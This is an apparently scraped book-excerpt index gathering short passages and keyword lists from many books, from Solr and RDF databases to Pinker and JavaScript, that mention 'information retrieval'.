barriers to entry, correlation does not imply causation, data acquisition, database schema, Drosophila, en.wikipedia.org, epigenetics, global pandemic, Hans Rosling, index card, information retrieval, iterative process, linked data, Mercator projection, meta analysis, meta-analysis, natural language processing, Netflix Prize, pattern recognition, peer-to-peer, performance metric, QR code, recommendation engine, semantic web, social graph, sorting algorithm, Steve Jobs, web application, wikimedia commons

[1] I should note here that in this context, “graph” means a collection of nodes and edges, not an x, y data plot. [2] See http://bit.ly/4iZib. [3] See http://en.wikipedia.org/wiki/George_Washingtons_Farewell_Address. [4] See http://avalon.law.yale.edu/18th_century/washing.asp. Chapter Nine The Big Picture: Search and Discovery Todd Holloway Search and discovery are two styles of information retrieval. Search is a familiar modality, well exemplified by Google and other web search engines. While there is a discovery aspect to search engines, there are more straightforward examples of discovery systems, such as product recommendations on Amazon and movie recommendations on Netflix. These two types of retrieval systems have in common that they can be incredibly complex under the hood.

Jessica Hagy is a writer, speaker, and consultant who boils soupy, complex ideas into tasty visual sauces for companies in need of clarity. She’s the author of acclaimed site thisisindexed.com, and her work has appeared in the New York Times, the BBC Magazine Online, Paste, Golf Digest, Redbook, New York Magazine, the National Post of Canada, the Guardian, Time, and many other old and new media outlets. Todd Holloway can’t get enough of information visualization, information retrieval, machine learning, data mining, the science of networks, and artificial intelligence. He is a Grinnell College and Indiana University alumnus. Noah Iliinsky has spent the last several years thinking about effective approaches to creating diagrams and other types of information visualization. He also works in interface and interaction design, all from a functional and user-centered perspective.


RDF Database Systems: Triples Storage and SPARQL Query Processing by Olivier Cure, Guillaume Blin

Amazon Web Services, bioinformatics, business intelligence, cloud computing, database schema, fault tolerance, full text search, information retrieval, Internet Archive, Internet of things, linked data, NP-complete, peer-to-peer, performance metric, random walk, recommendation engine, RFID, semantic web, Silicon Valley, social intelligence, software as a service, SPARQL, web application

Indeed, while compression is the main objective in URI encoding, the main feature sought in RDF stores related to literal is a full text search.The most popular solution for handling a full text search in literals is Lucene, integrated in RDF stores such as Yars2, Jena TDB/SDB, and GraphDB (formerly OWLIM), and in Big Data RDF databases, but it’s also popular for other systems, such as IBM OmnifindY! Edition, Technorati, Wikipedia, Internet Archive, and LinkedIn. Lucene is a very popular open-source information-retrieval library from the Apache Software Foundation (originally created in Java by Doug Cutting). It provides Java-based full-text indexing 99 100 RDF Database Systems and searching capabilities for applications through an easy-to-use API. Lucene is based on powerful and efficient search algorithms using indexes. A Lucene index is a collection of Lucene documents. A Lucene document contains Lucene fields of text.

Therefore, they can be used to identify the fastest index among the six clustered indexes.The overall claim of this multiple-index approach is that, due to a clever compression strategy, the total size of the indexes is less than the size required by a standard triples table solution. The system supports both individual update operations and updates to entire batches. More details on RDF-3X and its extension X-RDF-3X are provided in Chapter 6. The YARS (Harth and Decker, 2005) system combines methods from information retrieval and databases to allow for better query answering performance over RDF data. It stores RDF data persistently by using six B+tree indexes. It not only stores the subject, the predicate, and the object, but also the context information about the data origin. Each element of the corresponding quad (i.e., 4-uplet) is encoded in a dictionary storing mappings from literals and URIs to object IDs (object IDs are stored as number identifiers for compactness).To speed up keyword queries, the lexicon keeps an inverted index on string literals to allow fast full-text searches.


Getting the Builders in : How to Manage Homebuilding and Renovation Projects by Sales, Leonard John.

information retrieval

Building Your Own Home A practical guide to set up and manage a self-build programme for your perfect home The Beginner’s Guide to Property Investment The ultimate handbook for first-time buyers and would-be property investors How to be a Property Millionaire The Buy-to-Let Handbook For full details, please send for a free copy of the latest catalogue to: How To Books Spring Hill House, Spring Hill Road, Begbroke Oxford OX5 1RX, United Kingdom infoVhowtobooks.co.uk www.howtobooks.co.uk . Published by How To Content, A division of How To Books Ltd, Spring Hill House, Spring Hill Road, Begbroke Oxford OX5 1RX, United Kingdom. Tel: (01865) 375794. Fax: (01865) 379162. info_howtobooks.co.uk www.howtobooks.co.uk All rights reserved. No part of this work may be reproduced or stored in an information retrieval system (other than for purposes of review) without the express permission of the publisher in writing. The right of Leonard Sales to be identified as the author of this work has been asserted by him in accordance with the Copyright, Designs and Patents Act 1988. © 2008 Leonard Sales First published 2004 Second edition 2006 Third edition 2008 First published in electronic form 2008 British Library Cataloguing in Publication Data A catalogue record for this book is available from the British Library ISBN 978 1 84803 285 9 Cover design by Baseline Arts Ltd, Oxford Produced for How To Books by Deer Park Productions, Tavistock, Devon Typeset by TW Typesetting, Plymouth, Devon NOTE: The material contained in this book is set out in good faith for general guidance and no liability can be accepted for loss or expense incurred as a result of relying in particular circumstances on statements made in the book.


pages: 123 words: 32,382

Grouped: How Small Groups of Friends Are the Key to Influence on the Social Web by Paul Adams

Airbnb, Cass Sunstein, cognitive dissonance, David Brooks, information retrieval, invention of the telegraph, planetary scale, race to the bottom, Richard Thaler, sentiment analysis, social web, statistical model, The Wisdom of Crowds, web application, white flight

To reiterate, the first driving factor is that our online world is catching up with our offline world. Just as we are surrounded by people throughout our daily life, the web is being rebuilt around people. People are increasingly using the web to seek the information they need from each other, rather than from businesses directly. People always sourced information from each other offline, but up until now, online information retrieval tended to be from a business to a person. The second driving factor is an acknowledgment in our business models of the fact that people live in networks. For many years, we considered people as isolated, independent actors. Most of our consumer behavior models are structured this way—people acting independently, moving down a decision funnel, making objective choices along the way. Recent research in psychology and neuroscience shows that this isn’t how people make decisions.


pages: 353 words: 104,146

European Founders at Work by Pedro Gairifo Santos

business intelligence, cloud computing, crowdsourcing, fear of failure, full text search, information retrieval, inventory management, iterative process, Jeff Bezos, Joi Ito, Lean Startup, Mark Zuckerberg, natural language processing, pattern recognition, pre–internet, recommendation engine, Richard Stallman, Silicon Valley, Skype, slashdot, Steve Jobs, Steve Wozniak, subscription business, technology bubble, web application, Y Combinator

We e-mailed some mailing lists. We e-mailed the ISMIR2 mailing list. They're a group who meet every year about music recommendations and information retrieval in music. We ended up hiring a guy called Norman, who was both a great scientist and understood all the algorithms and captive audience sort of things, but also an excellent programmer who was able to implement all these ideas. So we got really lucky. The first person we hired was great and he just took over. He chucked out all of our crappy recommendation systems we had and built something good, and then improved it constantly for the next several years. __________ 2 The International Society for Music Information Retrieval So we had some A/B testing, split testing systems in there for the radio so they could try out new tweaks to the algorithms and see what was performing better.


pages: 648 words: 108,814

Solr 1.4 Enterprise Search Server by David Smiley, Eric Pugh

Amazon Web Services, bioinformatics, cloud computing, continuous integration, database schema, domain-specific language, en.wikipedia.org, fault tolerance, Firefox, information retrieval, Ruby on Rails, web application, Y Combinator

The major features found in Lucene are as follows: • A text-based inverted index persistent storage for efficient retrieval of documents by indexed terms A rich set of text analyzers to transform a string of text into a series of terms (words), which are the fundamental units indexed and searched A query syntax with a parser and a variety of query types from a simple term lookup to exotic fuzzy matches A good scoring algorithm based on sound Information Retrieval (IR) principles to produce the more likely candidates first, with flexible means to affect the scoring A highlighter feature to show words found in context • A query spellchecker based on indexed content • • • • For even more information on the query spellchecker, check out the Lucene In Action book (LINA for short) by Erik Hatcher and Otis Gospodnetić. Solr, the Server-ization of Lucene With the definition of Lucene behind us, Solr can be described succinctly as the server-ization of Lucene.

NW, , Atlanta, , 30327 hl fragmenter, highlighting component 165 hl maxAlternateFieldLength, highlighting component 165 hl maxAnalyzedChars, highlighting component 165 home directory, Solr bin 15 conf 15 conf/schema.xml 15 conf/solrconfig.xml 15 conf/xslt 15 data 15 lib 15 HTML, indexing in Solr 227 HTMLStripStandardTokenizerFactory 52 HTMLStripStandardTokenizerFactory tokenizer 227 HTMLStripWhitespaceTokenizerFactory 52 HTTP caching 277-279 HTTP server request access logs, logging about 201, 202 log directory, creating 201 Tailing 202 I IDF 33 idf 112 ID field 44 indent, diagnostic parameter 98 index 31 index-time and query-time, boosting 113 versus query-time 57 index-time boosting 70 IndexBasedSpellChecker options field 174 sourceLocation 174 thresholdTokenFrequency 175 index data document access, controlling 221 securing 220 indexed, field option 41 indexed, schema design 282 indexes sharding 295 indexing strategies about 283 factors, committing 285 factors, optimizing 285 unique document checking, disabling 285 Index Searchers 280 Information Retrieval. See IR int element 92 InternetArchive 226 invariants 111 Inverse Document Frequency. See IDF inverse reciprocals 125 IR 8 ISOLatin1AccentFilterFactory filter 62 issue tracker, Solr 27 J J2SE with JConsole 212 JARmageddon 205 jarowinkler, spellchecker 172 java.util.logging package 203 Java class names abbreviated 40 org.apache.solr.schema.BoolField 40 Java Development Kit (JDK) URL 11 JavaDoc tags 234 Java Management Extensions.


pages: 913 words: 265,787

How the Mind Works by Steven Pinker

affirmative action, agricultural Revolution, Alfred Russel Wallace, Buckminster Fuller, cognitive dissonance, Columbine, combinatorial explosion, complexity theory, computer age, computer vision, Daniel Kahneman / Amos Tversky, delayed gratification, double helix, experimental subject, feminist movement, four colour theorem, Gordon Gekko, greed is good, hedonic treadmill, Henri Poincaré, income per capita, information retrieval, invention of agriculture, invention of the wheel, Johannes Kepler, John von Neumann, lake wobegon effect, lateral thinking, Machine translation of "The spirit is willing, but the flesh is weak." to Russian and back, Mikhail Gorbachev, Murray Gell-Mann, mutually assured destruction, Necker cube, out of africa, pattern recognition, phenotype, plutocrats, Plutocrats, random walk, Richard Feynman, Ronald Reagan, Rubik’s Cube, Saturday Night Live, scientific worldview, Search for Extraterrestrial Intelligence, sexual politics, social intelligence, Steven Pinker, theory of mind, Thorstein Veblen, Turing machine, urban decay, Yogi Berra

The psychologist John Anderson has reverse-engineered human memory retrieval, and has shown that the limits of memory are not a byproduct of a mushy storage medium. As programmers like to say, “It’s not a bug, it’s a feature.” In an optimally designed information-retrieval system, an item should be recovered only when the relevance of the item outweighs the cost of retrieving it. Anyone who has used a computerized library retrieval system quickly comes to rue the avalanche of titles spilling across the screen. A human expert, despite our allegedly feeble powers of retrieval, vastly outperforms any computer in locating a piece of information from its content. When I need to find articles on a topic in an unfamiliar field, I don’t use the library computer; I send email to a pal in the field. What would it mean for an information-retrieval system to be optimally designed? It should cough up the information most likely to be useful at the time of the request.

A piece of information that has been requested many times in the past is more likely to be needed now than a piece that has been requested only rarely. A piece that has been requested recently is more likely to be needed now than a piece that has not been requested for a while. An optimal information-retrieval system should therefore be biased to fetch frequently and recently encountered items. Anderson notes that that is exactly what human memory retrieval does: we remember common and recent events better than rare and long-past events. He found four other classic phenomena in memory research that meet the optimal design criteria independently established for computer information-retrieval systems. A third notable feature of access-consciousness is the emotional coloring of experience. We not only register events but register them as pleasurable or painful. That makes us take steps to have more of the former and less of the latter, now and in the future.


Bookkeeping the Easy Way by Wallace W. Kravitz

double entry bookkeeping, information retrieval, post-work, profit motive

Kravitz Former Business Education Chairman Mineola High School Mineola, New York < previous page page_i next page > < previous page page_ii next page > Page ii In this book the names of individuals and companies and their types of businesses are fictitious. Any similarity with the names and types of business of a real person or company is purely coincidental. © Copyright 1999 by Barron's Educational Series, Inc. Prior © copyrights 1990, 1983 by Barron's Educational Series, Inc. All rights reserved. No part of this book may be reproduced in any form, by photostat, microfilm, xerography, or any other means, or incorporated into any information retrieval system, electronic or mechanical, without the written permission of the copyright owner. All inquiries should be addressed to: Barron's Educational Series, Inc. 250 Wireless Boulevard Hauppauge, NY 11788 http://www.barronseduc.com Library of Congress Catalog Card No. 99-17245 International Standard Book No. 0-7641-1079-9 Library of Congress Cataloging-in-Publication Data Kravitz, Wallace W.


pages: 429 words: 114,726

The Computer Boys Take Over: Computers, Programmers, and the Politics of Technical Expertise by Nathan L. Ensmenger

barriers to entry, business process, Claude Shannon: information theory, computer age, deskilling, Donald Knuth, Firefox, Frederick Winslow Taylor, future of work, Grace Hopper, informal economy, information retrieval, interchangeable parts, Isaac Newton, Jacquard loom, job satisfaction, John von Neumann, knowledge worker, loose coupling, new economy, Norbert Wiener, pattern recognition, performance metric, Philip Mirowski, post-industrial society, Productivity paradox, RAND corporation, Robert Gordon, Shoshana Zuboff, sorting algorithm, Steve Jobs, Steven Levy, the market place, Thomas Kuhn: the structure of scientific revolutions, Thorstein Veblen, Turing machine, Von Neumann architecture, Y2K

Mahoney, “Computer Science.” 79. Daniel McCracken, “The Human Side of Computing,” Datamation 7, no. 1 (1961): 9–11. Chapter 6 1. “The Thinking Machine,” Time magazine, January 23, 1950, 54–60. 2. J. Lear, “Can a Mechanical Brain Replace You?” Colliers, no. 131 (1953), 58–63. 3. “Office Robots,” Fortune 45 (January 1952), 82–87, 112, 114, 116, 118. 4. Cheryl Knott Malone, “Imagining Information Retrieval in the Library: Desk Set in Historical Context,” IEEE Annals of the History of Computing 24, no. 3 (2002): 14–22. 5. Ibid. 6. Ibid. 7. Thorstein Veblen, The Theory of the Leisure Class (New York: McMillan, 1899). 8. Thomas Haigh, “The Chromium-Plated Tabulator: Institutionalizing an Electronic Revolution, 1954–1958,” IEEE Annals of the History of Computing 4, no. 23 (2001), 75–104. 9.

New York: Oxford University Press, 2002. Mahoney, Michael. “Software as Science—Science as Software.” In History of Computing: Software Issues, ed. Ulf Hashagen, Reinhard Keil-Slawik, and Arthur Norberg. Berlin: Springer-Verlag, 2002, 25–48. Mahoney, Michael. “What Makes the History of Software Hard.” IEEE Annals of the History of Computing 30 (3) (2008): 8–18. Malone, Cheryl Knott. “Imagining Information Retrieval in the Library: Desk Set in Historical Context.” IEEE Annals of the History of Computing 24 (3) (2002): 14–22. Mandel, Lois. “The Computer Girls.” Cosmopolitan, April 1967, 52–56. Manion, Mark, and William M. Evan. “The Y2K problem: technological risk and professional responsibility.” ACM SIGCAS Computers and Society 29 (4) (1999): 24–29. Markham, Edward. “EDP Schools: An Inside View.”


pages: 924 words: 196,343

JavaScript & jQuery: The Missing Manual by David Sawyer McFarland

Firefox, framing effect, HyperCard, information retrieval, Ruby on Rails, Steve Jobs, web application

In order to add intelligence to your web pages so they can respond to your site’s visitors, you need JavaScript. JavaScript lets a web page react intelligently. With it, you can create smart web forms that let visitors know when they’ve forgotten to include necessary information; you can make elements appear, disappear, or move around a web page (see Figure 1-1); you can even update the contents of a web page with information retrieved from a web server—without having to load a new web page. In short, JavaScript lets you make your websites more engaging and effective. Figure 1-1. JavaScript lets web pages respond to visitors. On Amazon.com, mousing over the “Gifts & Wish Lists” link opens a tab that floats above the other content on the page and offers additional options. Note Actually, HTML5 does add some smarts to HTML–including basic form validation.

It can be as simple as this: { firstName : 'Bob', lastName : 'Smith' } In this code, firstName acts like a key with a value of Bob—a simple string value. However, the value can also be another object (see Figure 11-10 on page 376), so you can often end up with a complex nested structure—like dolls within dolls. That’s what Flickr’s JSON feed is like. Here’s a small snippet of one of those feeds. It shows the information retrieved for two photos: 1 { 2 "title": "Uploads from Smithsonian Institution", 3 "link": "http://www.flickr.com/photos/smithsonian/", 4 "description": "", 5 "modified": "2011-08-11T13:16:37Z", 6 "generator": "http://www.flickr.com/", 7 "items": [ 8 { 9 "title": "East Island, June 12, 1966.", 10 "link": "http://www.flickr.com/photos/smithsonian/5988083516/", 11 "media": {"m":"http://farm7.static.flickr.com/6029/5988083516_ bfc9f41286_m.jpg"}, 12 "date_taken": "2011-07-29T11:45:50-08:00", 13 "description": "Short description here", 14 "published": "2011-08-11T13:16:37Z", 15 "author": "nobody@flickr.com (Smithsonian Institution)", 16 "author_id": "25053835@N03", 17 "tags": "ocean birds redfootedbooby" 18 }, 19 { 20 "title": "Phoenix Island, April 15, 1966

You might add some code in your program to do that like this: $('.weed').click(function() { $(this).remove(); }); // end click The problem with this code is that it only applies to elements that already exist. If you programmatically add new divs—<div class=“weed”>—the click handler isn’t applied to them. Code that applies only to existing elements is also a problem when you use Ajax as described in Part Four of this book. Ajax lets you update content on a page using information retrieved from a web server. Gmail, for example, can display new mail as you receive it by continually retrieving it from a web server and updating the content in the web browser. In this case, your list of received emails changes after you first started using Gmail. Any events that were applied to the page content when the page loads won’t apply to the new content added from the server. You can reapply event handlers whenever the page is updated, but this method is slow and inefficient.


Scikit-Learn Cookbook by Trent Hauck

bioinformatics, computer vision, information retrieval, p-value

This will tell us which points should be associated with which clusters: >>> labels = k_means.labels_ >>> labels[:5] array([1, 1, 1, 1, 1], dtype=int32) At this point, we require the simplest of NumPy array manipulation followed by a bit of reshaping, and we'll have the new image: >>> plt.imshow(centers[labels].reshape(x, y, z)) The following is the resultant image: 101 www.it-ebooks.info Building Models with Distance Metrics Finding the closest objects in the feature space Sometimes, the easiest thing to do is to just find the distance between two objects. We just need to find some distance metric, compute the pairwise distances, and compare the outcomes to what's expected. Getting ready A lower-level utility in scikit-learn is sklearn.metrics.pairwise. This contains server functions to compute the distances between the vectors in a matrix X or the distances between the vectors in X and Y easily. This can be useful for information retrieval. For example, given a set of customers with attributes of X, we might want to take a reference customer and find the closest customers to this customer. In fact, we might want to rank customers by the notion of similarity measured by a distance function. The quality of the similarity depends upon the feature space selection as well as any transformation we might do on the space. We'll walk through several different scenarios of measuring distance.


pages: 742 words: 137,937

The Future of the Professions: How Technology Will Transform the Work of Human Experts by Richard Susskind, Daniel Susskind

23andMe, 3D printing, additive manufacturing, AI winter, Albert Einstein, Amazon Mechanical Turk, Amazon Web Services, Andrew Keen, Atul Gawande, Automated Insights, autonomous vehicles, Big bang: deregulation of the City of London, big data - Walmart - Pop Tarts, Bill Joy: nanobots, business process, business process outsourcing, Cass Sunstein, Checklist Manifesto, Clapham omnibus, Clayton Christensen, clean water, cloud computing, commoditize, computer age, Computer Numeric Control, computer vision, conceptual framework, corporate governance, creative destruction, crowdsourcing, Daniel Kahneman / Amos Tversky, death of newspapers, disintermediation, Douglas Hofstadter, en.wikipedia.org, Erik Brynjolfsson, Filter Bubble, full employment, future of work, Google Glasses, Google X / Alphabet X, Hacker Ethic, industrial robot, informal economy, information retrieval, interchangeable parts, Internet of things, Isaac Newton, James Hargreaves, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, Joseph Schumpeter, Khan Academy, knowledge economy, lifelogging, lump of labour, Marshall McLuhan, Metcalfe’s law, Narrative Science, natural language processing, Network effects, optical character recognition, Paul Samuelson, personalized medicine, pre–internet, Ray Kurzweil, Richard Feynman, Second Machine Age, self-driving car, semantic web, Shoshana Zuboff, Skype, social web, speech recognition, spinning jenny, strong AI, supply-chain management, telepresence, The Future of Employment, the market place, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, transaction costs, Turing test, Watson beat the top human players on Jeopardy!, WikiLeaks, young professional

For us, it represents the coming of the second wave of AI (section 4.9). Here is a system that undoubtedly performs tasks that we would normally think require human intelligence. The version of Watson that competed on Jeopardy! holds over 200 million pages of documents and implements a wide range of AI tools and techniques, including natural language processing, machine learning, speech synthesis, game-playing, information retrieval, intelligent search, knowledge processing and reasoning, and much more. This type of AI, we stress again, is radically different from the first wave of rule-based expert systems of the 1980s (see section 4.9). It is interesting to note, harking back again to the exponential growth of information technology, that the hardware on which Watson ran in 2011 was said to be about the size of the average bedroom.

It has instead been hibernating, conserving its energy, as it were, ticking over quietly in the background, waiting for enabling technologies to emerge and catch up with some of the original aspirations of the early AI scientists. In the thaw that has followed the winter, over the past few years, we have seen a series of significant developments—Big Data, Watson, robotics, and affective computing—that we believe point to a second wave of AI. In summary, the computerization of the work of professionals began in earnest in the late 1970s with information retrieval systems. Then, in the 1980s, there were first-generation AI systems in the professions, whose main focus was expert systems technologies. In the next decade, the 1990s, there was a shift towards the field of knowledge management, when professionals started to store and retrieve not just source materials but know-how and working practices. In the 2000s, Google came to dominate the research habits of many professionals, and grew to become the indispensable tool of practitioners searching for materials, if not for solutions.


pages: 165 words: 50,798

Intertwingled: Information Changes Everything by Peter Morville

A Pattern Language, Airbnb, Albert Einstein, Arthur Eddington, augmented reality, Bernie Madoff, Black Swan, business process, Cass Sunstein, cognitive dissonance, collective bargaining, disruptive innovation, index card, information retrieval, Internet of things, Isaac Newton, iterative process, Jane Jacobs, John Markoff, Lean Startup, Lyft, minimum viable product, Mother of all demos, Nelson Mandela, Paul Graham, peer-to-peer, RFID, Richard Thaler, ride hailing / ride sharing, Schrödinger's Cat, self-driving car, semantic web, sharing economy, Silicon Valley, Silicon Valley startup, source of truth, Steve Jobs, Stewart Brand, Ted Nelson, The Death and Life of Great American Cities, the scientific method, The Wisdom of Crowds, theory of mind, uber lyft, urban planning, urban sprawl, Vannevar Bush, zero-sum game

That question sent me to graduate school at the University of Michigan. In 1992, I started classes at the School of Information and Library Studies, and promptly began to panic. I was stuck in required courses like Reference and Cataloging with people who wanted to be librarians. In hindsight, I’m glad I took those classes, but at the time I was convinced I’d made a very big mistake. It took a while to find my groove. I studied information retrieval and database design. I explored Dialog, the world’s first commercial online search service. And I fell madly in love with the Internet. The tools were crude, the content sparse, but the promise irresistible. A global network of networks that provides universal access to ideas and information: how could anyone who loves knowledge resist that? I was hooked. I dedicated myself to “the design of information systems.”


pages: 170 words: 49,193

The People vs Tech: How the Internet Is Killing Democracy (And How We Save It) by Jamie Bartlett

Ada Lovelace, Airbnb, Amazon Mechanical Turk, Andrew Keen, autonomous vehicles, barriers to entry, basic income, Bernie Sanders, bitcoin, blockchain, Boris Johnson, central bank independence, Chelsea Manning, cloud computing, computer vision, creative destruction, cryptocurrency, Daniel Kahneman / Amos Tversky, Dominic Cummings, Donald Trump, Edward Snowden, Elon Musk, Filter Bubble, future of work, gig economy, global village, Google bus, hive mind, Howard Rheingold, information retrieval, Internet of things, Jeff Bezos, job automation, John Maynard Keynes: technological unemployment, Julian Assange, manufacturing employment, Mark Zuckerberg, Marshall McLuhan, Menlo Park, meta analysis, meta-analysis, mittelstand, move fast and break things, move fast and break things, Network effects, Nicholas Carr, off grid, Panopticon Jeremy Bentham, payday loans, Peter Thiel, prediction markets, QR code, ransomware, Ray Kurzweil, recommendation engine, Renaissance Technologies, ride hailing / ride sharing, Robert Mercer, Ross Ulbricht, Sam Altman, Satoshi Nakamoto, Second Machine Age, sharing economy, Silicon Valley, Silicon Valley ideology, Silicon Valley startup, smart cities, smart contracts, smart meter, Snapchat, Stanford prison experiment, Steve Jobs, Steven Levy, strong AI, TaskRabbit, technological singularity, technoutopianism, Ted Kaczynski, the medium is the message, the scientific method, The Spirit Level, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, theory of mind, too big to fail, ultimatum game, universal basic income, WikiLeaks, World Values Survey, Y Combinator

Over the past few years, big tech firms have bought promising AI start-ups by the truckload. Google’s DeepMind is one of only a dozen they have recently acquired. Apple splashed out $200 million for Turi, a machine learning start-up, in 2016, and Intel has invested over $1 billion in AI companies over the past couple of years.7 Market leaders in AI like Google, with the data, the geniuses, the experience and the computing power, won’t be limited to just search and information retrieval. They will also be able to leap ahead in almost anything where AI is important: logistics, driverless cars, medical research, television, factory production, city planning, agriculture, energy use, storage, clerical work, education and who knows what else. Amazon is already a retailer, marketing platform, delivery and logistics network, payment system, credit lender, auction house, book publisher, TV production company, fashion designer and cloud computing provider.8 What next?


pages: 286 words: 94,017

Future Shock by Alvin Toffler

Albert Einstein, Brownian motion, Buckminster Fuller, Charles Lindbergh, cognitive dissonance, Colonization of Mars, corporate governance, East Village, global village, Haight Ashbury, information retrieval, invention of agriculture, invention of movable type, invention of writing, longitudinal study, Marshall McLuhan, mass immigration, Menlo Park, New Urbanism, Norman Mailer, post-industrial society, RAND corporation, social intelligence, the market place, Thomas Kuhn: the structure of scientific revolutions, urban renewal, Whole Earth Catalog, zero-sum game

The profession of airline flight engineer, he notes, emerged and then began to die out within a brief period of fifteen years. A look at the "help wanted" pages of any major newspaper brings home the fact that new occupations are increasing at a mind-dazzling rate. Systems analyst, console operator, coder, tape librarian, tape handler, are only a few of those connected with computer operations. Information retrieval, optical scanning, thin-film technology all require new kinds of expertise, while old occupations lose importance or vanish altogether. When Fortune magazine in the mid-1960's surveyed 1,003 young executives employed by major American corporations, it found that fully one out of three held a job that simply had not existed until he stepped into it. Another large group held positions that had been filled by only one incumbent before them.

Just as economic mass production required large numbers of workers to be assembled in factories, educational mass production required large numbers of students to be assembled in schools. This itself, with its demands for uniform discipline, regular hours, attendance checks and the like, was a standardizing force. Advanced technology will, in the future, make much of this unnecessary. A good deal of education will take place in the student's own room at home or in a dorm, at hours of his own choosing. With vast libraries of data available to him via computerized information retrieval systems, with his own tapes and video units, his own language laboratory and his own electronically equipped study carrel, he will be freed, for much of the time, of the restrictions and unpleasantness that dogged him in the lockstep classroom. The technology upon which these new freedoms will be based will inevitably spread through the schools in the years ahead—aggressively pushed, no doubt, by major corporations like IBM, RCA, and Xerox.


pages: 573 words: 157,767

From Bacteria to Bach and Back: The Evolution of Minds by Daniel C. Dennett

Ada Lovelace, Alan Turing: On Computable Numbers, with an Application to the Entscheidungsproblem, Andrew Wiles, Bayesian statistics, bioinformatics, bitcoin, Build a better mousetrap, Claude Shannon: information theory, computer age, computer vision, double entry bookkeeping, double helix, Douglas Hofstadter, Elon Musk, epigenetics, experimental subject, Fermat's Last Theorem, Gödel, Escher, Bach, information asymmetry, information retrieval, invention of writing, Isaac Newton, iterative process, John von Neumann, Menlo Park, Murray Gell-Mann, Necker cube, Norbert Wiener, pattern recognition, phenotype, Richard Feynman, Rodney Brooks, self-driving car, social intelligence, sorting algorithm, speech recognition, Stephen Hawking, Steven Pinker, strong AI, The Wealth of Nations by Adam Smith, theory of mind, Thomas Bayes, trickle-down economics, Turing machine, Turing test, Watson beat the top human players on Jeopardy!, Y2K

Perception & Psychophysics 58 (6): 927–935. Lewis, S. M., and C. K. Cratsley. 2008. “Flash Signal Evolution, Mate Choice and Predation in Fireflies.” Annual Review of Entomology 53: 293–321. Lieberman, Matthew D. 2013. Social: Why Our Brains Are Wired to Connect. New York: Crown. Littman, Michael L., Susan T. Dumais, and Thomas K. Landauer. 1998. “Automatic Cross-Language Information Retrieval Using Latent Semantic Indexing.” In Cross-Language Information Retrieval, 51–62. New York: Springer. Lycan, William G. 1987. Consciousness. Cambridge, Mass.: MIT Press. MacCready, P. 1999. “An Ambivalent Luddite at a Technological Feast.” Designfax, August. MacKay, D. M. 1968. “Electroencephalogram Potentials Evoked by Accelerated Visual Motion.” Nature 217: 677–678. Markkula, G. 2015. “Answering Questions about Consciousness by Modeling Perception as Covert Behavior.”


Principles of Protocol Design by Robin Sharp

accounting loophole / creative accounting, business process, discrete time, fault tolerance, finite state, Gödel, Escher, Bach, information retrieval, loose coupling, MITM: man-in-the-middle, packet switching, RFC: Request For Comment, stochastic process

Specification of acceptable message types, languages, content encodings, character sets. Challenge-response mechanism for authentication of client (see Section 11.4.4). Coding: ASCII encoding of all PDUs. Addressing: Uniform Resource Identifier (URI) identifies destination system and path to resource. Fault tolerance: Resistance to corruption via optional MD5 checksumming of resource content during transfer. 11.4.3 Web Caching Since most distributed information retrieval applications involve transfer of considerable amounts of data through the network, caching is commonly used in order to reduce the amount of network traffic and reduce response times. HTTP, which is intended to support such applications, therefore includes explicit mechanisms for controlling the operation of caching. Since these illustrate a number of ideas which are important in several application areas, they will be described in some detail here.

A good review of coordination languages and the protocols used to implement them can be found in the monograph edited by Omicini et al. [103], while Baumann [6] gives a good overview of the technologies behind mobile agents. The proceedings of the two series of international workshops on “Intelligent Agents for Telecommunication Applications”, and on “Cooperative Information Agents” are good places to search for the results of recent research into both theory and applications of agents in the telecommunications and information retrieval areas. A new trend in the construction of very large distributed systems is to base them on Grid technology. This is a technology for coordinating the activities of a potentially huge number of computers, in order to supply users with computer power, in the form of CPU power, storage and other resources. The analogy is to the electric grid, which provides users with electric power without their having to think about exactly where it comes from.


pages: 501 words: 145,943

If Mayors Ruled the World: Dysfunctional Nations, Rising Cities by Benjamin R. Barber

Affordable Care Act / Obamacare, American Legislative Exchange Council, Berlin Wall, bike sharing scheme, borderless world, Boris Johnson, Bretton Woods, British Empire, car-free, carbon footprint, Cass Sunstein, Celebration, Florida, clean water, corporate governance, crowdsourcing, David Brooks, desegregation, Detroit bankruptcy, digital Maoism, disintermediation, edge city, Edward Glaeser, Edward Snowden, Etonian, failed state, Fall of the Berlin Wall, feminist movement, Filter Bubble, George Gilder, ghettoisation, global pandemic, global village, Hernando de Soto, Howard Zinn, illegal immigration, In Cold Blood by Truman Capote, income inequality, informal economy, information retrieval, Jane Jacobs, Jaron Lanier, Jeff Bezos, London Interbank Offered Rate, Mark Zuckerberg, market fundamentalism, Marshall McLuhan, Masdar, megacity, microcredit, Mikhail Gorbachev, mortgage debt, mutually assured destruction, new economy, New Urbanism, Nicholas Carr, Norman Mailer, nuclear winter, obamacare, Occupy movement, Panopticon Jeremy Bentham, Peace of Westphalia, Pearl River Delta, peer-to-peer, planetary scale, plutocrats, Plutocrats, profit motive, Ralph Waldo Emerson, RFID, Richard Florida, Ronald Reagan, self-driving car, Silicon Valley, Skype, smart cities, smart meter, Steve Jobs, Stewart Brand, Telecommunications Act of 1996, The Death and Life of Great American Cities, The Fortune at the Bottom of the Pyramid, The Wealth of Nations by Adam Smith, Tobin tax, Tony Hsieh, trade route, UNCLOS, UNCLOS, unpaid internship, urban sprawl, War on Poverty, zero-sum game

I myself was fascinated when, nearly thirty years ago, I enthused about emerging interactive technologies and the impact they might have on citizenship and “strong democracy”: The wiring of homes for cable television across America . . . the availability of low frequency and satellite transmissions in areas beyond regular transmission or cable and the interactive possibilities of video, computers, and information retrieval systems open up a new mode of human communication that can be used either in civic and constructive ways or in manipulative and destructive ways.19 Mine was one of the earliest instances of anticipatory enthusiasm (though laced with skepticism), but a decade later with the web actually in development, cyber zealots were everywhere predicting a new electronic frontier for civic interactivity.

